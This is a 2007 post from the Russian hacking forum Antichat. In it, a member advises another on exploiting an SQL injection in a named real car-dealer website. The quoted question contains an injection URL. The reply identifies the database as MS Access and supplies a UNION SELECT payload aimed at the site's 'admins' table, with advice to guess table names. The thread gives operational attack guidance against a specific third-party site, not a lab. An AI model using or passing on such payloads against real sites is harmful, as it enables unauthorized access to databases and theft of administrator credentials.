05.12.2007, 01:23
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
Сообщение от LolFEm
Возможно ли тут раскрутить иньекцию?
http://www.rochesterautodealers.com/news.asp?id=10'%201%20or%201=(select%20db_name())--
Это вобщето инъекция в MSAccess...
теоретически раскрутить можно:
Код:
http://www.rochesterautodealers.com/news.asp?id=1%20union%20select%201,2,3,4,5,6,7,8,9,10,11%20from%20admins
подбирай таблицы, прав на чтение системных таблиц нет
З.Ы. вобще .Slip в чем то прав, но это так, мысли вслух ни к кому неотносящиеся
__________________
Карфаген должен быть разрушен...
Последний раз редактировалось Scipio; 05.12.2007 в 01:30..
|
|
|